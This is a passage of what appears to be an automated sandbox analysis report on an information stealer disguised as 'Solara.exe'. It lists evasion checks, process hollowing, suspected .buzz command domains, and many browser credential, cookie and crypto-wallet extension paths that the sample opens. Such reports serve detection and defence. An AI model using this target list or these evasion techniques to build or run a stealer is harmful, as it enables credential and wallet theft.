                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0043E240 push eax; mov dword ptr [esp], 505352A5h2_2_0043E244
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0044885C push eax; iretd 2_2_00448860
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00447FED push edx; ret 2_2_00447FEE
                Source: C:\Users\user\Desktop\Solara.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\Solara.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\Solara.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeWindow / User API: threadDelayed 6391Jump to behavior
                Source: C:\Users\user\Desktop\Solara.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-19979
                Source: C:\Users\user\Desktop\Solara.exeAPI coverage: 9.3 %
                Source: C:\Users\user\Desktop\Solara.exe TID: 7640Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Solara.exe TID: 7840Thread sleep count: 6391 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Solara.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\Solara.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Solara.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Solara.exeCode function: 0_2_00221FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00221FE9
                Source: Solara.exe, 00000002.00000003.1792136717.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1806487513.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000002.2898114535.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1831530096.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.2454619814.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.2456495685.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1694562958.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1768091011.0000000002D70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWj`2
                Source: Solara.exe, 00000002.00000003.1792136717.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1806487513.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000002.2898114535.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1831530096.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.2454619814.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.2456495685.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1694562958.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1768091011.0000000002D70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Solara.exe, 00000002.00000002.2897950813.0000000002D1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                Source: C:\Users\user\Desktop\Solara.exeAPI call chain: ExitProcess graph end nodegraph_2-34032
                Source: C:\Users\user\Desktop\Solara.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0043CB40 LdrInitializeThunk,2_2_0043CB40
                Source: C:\Users\user\Desktop\Solara.exeCode function: 0_2_0020F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0020F8E9
                Source: C:\Users\user\Desktop\Solara.exeCode function: 0_2_0023A19E mov edi, dword ptr fs:[00000030h]0_2_0023A19E
                Source: C:\Users\user\Desktop\Solara.exeCode function: 0_2_00201FB0 mov edi, dword ptr fs:[00000030h]0_2_00201FB0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00201FB0 mov edi, dword ptr fs:[00000030h]2_2_00201FB0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 0_2_0021D8E0 GetProcessHeap,0_2_0021D8E0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 0_2_0020F52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0020F52D
                Source: C:\Users\user\Desktop\Solara.exeCode function: 0_2_0020F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0020F8E9
                Source: C:\Users\user\Desktop\Solara.exeCode function: 0_2_0020F8DD SetUnhandledExceptionFilter,0_2_0020F8DD
                Source: C:\Users\user\Desktop\Solara.exeCode function: 0_2_00217E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00217E30
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0020F52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0020F52D
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0020F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0020F8E9
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0020F8DD SetUnhandledExceptionFilter,2_2_0020F8DD
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00217E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00217E30

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\Solara.exeCode function: 0_2_0023A19E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_0023A19E
                Source: C:\Users\user\Desktop\Solara.exeMemory written: C:\Users\user\Desktop\Solara.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: Solara.exe, 00000000.00000002.1647778505.0000000005148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hummskitnj.buzz
                Source: Solara.exe, 00000000.00000002.1647778505.0000000005148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cashfuzysao.buzz
                Source: Solara.exe, 00000000.00000002.1647778505.0000000005148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: appliacnesot.buzz
                Source: Solara.exe, 00000000.00000002.1647778505.0000000005148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: screwamusresz.buzz
                Source: Solara.exe, 00000000.00000002.1647778505.0000000005148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: inherineau.buzz
                Source: Solara.exe, 00000000.00000002.1647778505.0000000005148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: scentniej.buzz
                Source: Solara.exe, 00000000.00000002.1647778505.0000000005148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rebuildeso.buzz
                Source: Solara.exe, 00000000.00000002.1647778505.0000000005148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: prisonyfork.buzz
                Source: Solara.exe, 00000000.00000002.1647778505.0000000005148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: mindhandru.buzz
                Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Users\user\Desktop\Solara.exe "C:\Users\user\Desktop\Solara.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Solara.exeCode function: EnumSystemLocalesW,0_2_0021D1BD
                Source: C:\Users\user\Desktop\Solara.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00221287
                Source: C:\Users\user\Desktop\Solara.exeCode function: EnumSystemLocalesW,0_2_002214D8
                Source: C:\Users\user\Desktop\Solara.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00221580
                Source: C:\Users\user\Desktop\Solara.exeCode function: EnumSystemLocalesW,0_2_002217D3
                Source: C:\Users\user\Desktop\Solara.exeCode function: GetLocaleInfoW,0_2_00221840
                Source: C:\Users\user\Desktop\Solara.exeCode function: EnumSystemLocalesW,0_2_00221915
                Source: C:\Users\user\Desktop\Solara.exeCode function: GetLocaleInfoW,0_2_00221960
                Source: C:\Users\user\Desktop\Solara.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00221A07
                Source: C:\Users\user\Desktop\Solara.exeCode function: GetLocaleInfoW,0_2_00221B0D
                Source: C:\Users\user\Desktop\Solara.exeCode function: GetLocaleInfoW,0_2_0021CC15
                Source: C:\Users\user\Desktop\Solara.exeCode function: EnumSystemLocalesW,2_2_0021D1BD
                Source: C:\Users\user\Desktop\Solara.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00221287
                Source: C:\Users\user\Desktop\Solara.exeCode function: EnumSystemLocalesW,2_2_002214D8
                Source: C:\Users\user\Desktop\Solara.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00221580
                Source: C:\Users\user\Desktop\Solara.exeCode function: EnumSystemLocalesW,2_2_002217D3
                Source: C:\Users\user\Desktop\Solara.exeCode function: GetLocaleInfoW,2_2_00221840
                Source: C:\Users\user\Desktop\Solara.exeCode function: EnumSystemLocalesW,2_2_00221915
                Source: C:\Users\user\Desktop\Solara.exeCode function: GetLocaleInfoW,2_2_00221960
                Source: C:\Users\user\Desktop\Solara.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00221A07
                Source: C:\Users\user\Desktop\Solara.exeCode function: GetLocaleInfoW,2_2_00221B0D
                Source: C:\Users\user\Desktop\Solara.exeCode function: GetLocaleInfoW,2_2_0021CC15
                Source: C:\Users\user\Desktop\Solara.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeCode function: 0_2_002100B4 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,0_2_002100B4
                Source: C:\Users\user\Desktop\Solara.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Solara.exe, 00000002.00000003.1792136717.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.2455760830.0000000002D42000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1831766442.0000000002D42000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1792234082.0000000002DE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\Solara.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: Solara.exe PID: 7620, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Solara.exe, 00000002.00000003.2455760830.0000000002D4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: Solara.exe, 00000002.00000003.2455760830.0000000002D4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: Solara.exe, 00000002.00000003.1831530096.0000000002DBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: lmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmnfpi","e(
                Source: Solara.exe, 00000002.00000003.2455760830.0000000002D4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Solara.exe, 00000002.00000003.1768091011.0000000002D70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: Solara.exe, 00000002.00000003.1831530096.0000000002DBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ,{"en":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onhogfje
                Source: Solara.exe, 00000002.00000003.2455760830.0000000002D4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: Solara.exe, 00000002.00000003.1768091011.0000000002D5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Solara.exe, 00000002.00000003.1831530096.0000000002DCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
